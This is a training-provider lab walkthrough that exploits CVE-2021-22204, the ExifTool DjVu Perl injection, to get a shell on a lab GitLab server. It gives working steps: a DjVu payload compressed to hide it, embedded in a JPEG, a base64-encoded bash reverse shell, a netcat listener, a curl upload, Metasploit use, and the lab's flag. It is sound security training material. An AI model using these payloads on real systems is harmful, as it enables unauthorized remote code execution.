ExifTool Command Injectio ...
    21 September 22

    ExifTool Command Injection (CVE-2021-22204)

    Posted byINE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Purpose: We are learning how to manually exploit the Gitlab server running the ExifTool vulnerable version to better understand the vulnerability. Also, we will use Metasploit Framework to generate a malicious image that gives us a meterpreter session.

    Technical difficulty: Beginner


    In 2021, a critical vulnerability was found in the ExifTool tool. The ExifTool is used in many significant applications such as Gitlab. Gitlab uses this tool as a dependency for their product. One issue in the Gitlab lab was exploited due to a vulnerability found in the ExifTool tool. Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image. Many python scripts and a Metasploit module are available to generate the malicious image file.

    The vulnerability severity base score is 7.8.

    In this lab, we targeted the Gitlab server, where the git server was not correctly validating image files passed to a file parser, resulting in remote command execution.

    The CVE assigned to this vulnerability is CVE-2021-22204.

    Lab Environment

    In this lab environment, the user will access a Kali GUI instance. A vulnerable machine GitLab server deployed on http://demo.ine.local. 

    Goal after completing this scenario: Exploit the Gitlab server using a malicious .jpg image and gain the shell. Then read the flag.



    The best tools for this lab are:

    - Nmap

    - Bash Shell

    - ExifTool

    - Metasploit Framework

    Lab Link: 


    Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!

    What is GitLab?

    GitLab Community Edition (CE) is an open-source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab CE on your own servers, in a container, or on a cloud provider.

    On April 14, 2021, GitLab published a security release to address CVE-2021-22205, a critical remote code execution vulnerability in the service's web interface. At the time, GitLab described the issue as an authenticated vulnerability that was the result of passing user-provided images to the service's embedded version of ExifTool. A remote attacker could execute arbitrary commands as the git user due to ExifTool's mishandling of DjVu files, an issue that was later assigned CVE-2021-22204.

    In this lab, we are focused on exploiting CVE-2021-22204

    Affected products

    GitLab's April 2021 advisory affects all versions of both GitLab Enterprise Edition (EE) and GitLab Community Edition (CE) starting from 11.9. The vulnerability was patched in the following versions:

    - 13.10.3

    - 13.9.6

    - 13.8.8


    What is ExifTool?

    ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata. It is platform-independent, available as both a Perl library (Image::ExifTool) and command-line application. ExifTool is commonly incorporated into different types of digital workflows and supports many types of metadata including Exif, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, as well as the manufacturer-specific metadata formats of many digital cameras.


    What is Djvu?

    Djvu is a computer file format designed primarily to store scanned documents, especially those containing a combination of text, line drawings, indexed color images, and photographs. It uses technologies such as image layer separation of text and background/images, progressive loading, arithmetic coding, and lossy compression for bitonal (monochrome) images. This allows high-quality, readable images to be stored in a minimum of space, so that they can be made available on the web.


    For vulnerability analysis, we highly recommend you to please refer to this blog post written by [convisoappsec](


    Step 1: Open the lab link to access the Kali machine.

    Kali machine


    Step 2: Check if the provided machine/domain is reachable.


    ping -c 4 demo.ine.local


    The provided machine is reachable, and we also found the target's IP address.

    Step 3: Check all open ports on the machine.


    nmap demo.ine.local


    Multiple ports are open. The GitLab server is running on port 80.

    Step 4: Run the firefox browser and access port 80 to identify the GitLab server.

    URL: http://demo.ine.loca


    The target is running the Gitlab server.

    Exploiting Manually

    Step 5:

    We will manually exploit the vulnerability by generating the malicious .jpg image.

    To trigger the vulnerable function, we need to create a valid DjVu file that contains an annotation chunk with the payload that will be executed by the eval function as Perl code. To create this valid DjVu file, we used the tool djvumake , from the [djvulibre]( toolkit. A toolkit for DjVu file manipulation. We will also use the tool bzz to compress our payload, then it will not be easily visible in the DjVu file. (in case someone try to inspect it)


    We will generate a malicious .jpg file on the Kali machine. A vulnerable ExifTool application is installed on the Kali machine to understand how the exploit/vulnerability is working. 

    First, we will try on the Kali machine; then, we will exploit Gitlab, which is using a vulnerable version of ExifTool. 

    Create a payload file with the below content in it.

    Payload: (metadata "\c${system('id')};")


    nano payload

    cat payload


    Compress the payload file to make it non-human-readable


    bzz payload payload.bzz


    Making .djvu file using djvumake utility.


    djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

    file exploit.djvu

    INFO = Anything in the format 'N,N' where N is a number

    BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as a background image

    ANTz = Will write the compressed annotation chunk with the input file


    We have successfully generated the malicious .djvu file that will execute id command when someone tries to analyze it with the ExifTool tool.

    We are running ExifTool to check the malicious file behavior.


    exiftool exploit.djvu 


    As we can notice, we have successfully executed the command id while analyzing the exploit.djvu file using the ExifTool tool. This confirms that ExifTool version 12.23 is vulnerable to Command Injection vulnerability.

    Step 6: Let's exploit the GitLab server.

    We will again generate another malicious .djvu file. But, this time, we are exploiting the Gitlab server. It doesn't support .djvu format file. We need an image file. 

    We can easily create a .djvu file to .jgp using the below config file.

    %Image::ExifTool::UserDefined = (
        All EXIF tags are added to the Main table, and WriteGroup is used to
        specify where the tag is written (default is ExifIFD if not specified):
        'Image::ExifTool::Exif::Main' => {
            Example 1.  EXIF:NewEXIFTag
            0xc51b => {
                Name => 'HasselbladExif',
                Writable => 'string',
                WriteGroup => 'IFD0',
            add more user-defined EXIF tags here...
    1; #end%

    What this file does is make it possible for us to write a new tag on the file with the name HasselbladExif and the bytes 0xc51b to identify it inside our new file. Then we can insert it inside of any file. Then use it and our already made exploit.djvu to insert the malicious DjVu file inside a valid JPEG:

    Generating a new .djvu file with Bash reverse shell in it.

    First, let's check the attacker's machine IP address.


    ip addr


    The attacker machine IP address is:

    Note: In your case, please remember to change the attacker machine IP address

    Bash Reverse Shell: sh -i >& /dev/tcp/ 0>&1

    First, encode the shell in base64 format.


    echo 'sh -i >& /dev/tcp/ 0>&1' | base64 


    Payload: (metadata "\c${system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMjcuMy80NDQ0IDA+JjEK | base64 -d | bash')};")


    nano payload

    cat payload

    bzz payload payload.bzz

    djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

    file exploit.djvu


    Now, converting the .djvu file into .jgp


    cat configfile

    cp /usr/share/wallpaper.jpg .

    exiftool -config configfile '-HasselbladExif<=exploit.djvu' wallpaper.jpg

    configfile = The name of our configuration file;

    -HasselbladExif = Tag name that are specified in the config file;

    exploit.djvu = Our exploit, previously made with djvumake;

    wallpaper.jpg = A valid JPEG file;


    Start the netcat listener on port 4444


    nc -lvp 4444


    Send the payload to gain the bash shell.


    curl -v -F 'file=@/root/wallpaper.jpg' http://demo.ine.local/$(openssl rand -hex 8)



    We have received a shell.


    Exploiting Using Metasploit

    Step 7: Metasploit module is available to generate the malicious image. Use the module to generate the malicious image and exploit the Gitlab server manually using curl.

    Start the Metasploit framework and search for the ExifTool exploit module.


    msfconsole -q

    search exiftool


    There is a metasploit module available: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection

    ExifTool DjVu ANT Perl injection

    This module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.


    For more understanding about the ExifTool CVE-2021-22204 - Arbitrary Code Execution: Here is an excellent blog post by [William Bowling](

    Use the exiftool_djvu_ant_perl_injection exploit module and check all available options.


    use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection

    show options

    All the options are already set. Start the Metasploit handler while generating the malicious image.

    Set DISABLEPAYLOADHANDLER to false, set WfsDelay to 100, and then run the module.


    Check the file details.


    set PAYLOAD cmd/unix/reverse_bash


    set WfsDelay 100


    The image is generated in the /root/.msf4/local/msf.jpg. It's a JPEG image data with Exif standard.


    Note: Make sure that your Metasploit handler is running

    Send the payload to gain the meterpreter session.


    curl -v -F 'file=@/root/.msf4/local/msf.jpg' http://demo.ine.local/$(openssl rand -hex 8)


    Received the meterpreter session.


    Successfully exploited the target machine.

    Step 8: Read the flag.


    cd ..


    cat flag.txt


    FLAG: 7e9b2ed1272331cfbd2aac2e5eb3f84b


    We have successfully exploited the Gitlab server abusing exiftool’s vulnerability (ExifTool’s mishandling of DjVu files) that allows an attacker to perform a command injection using a malicious image. Gitlab was not correctly validating image files that were passed to a file parser; hence, it is possible to exploit the vulnerability. 


    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Hey! Don’t miss anything - subscribe to our newsletter!

    © 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo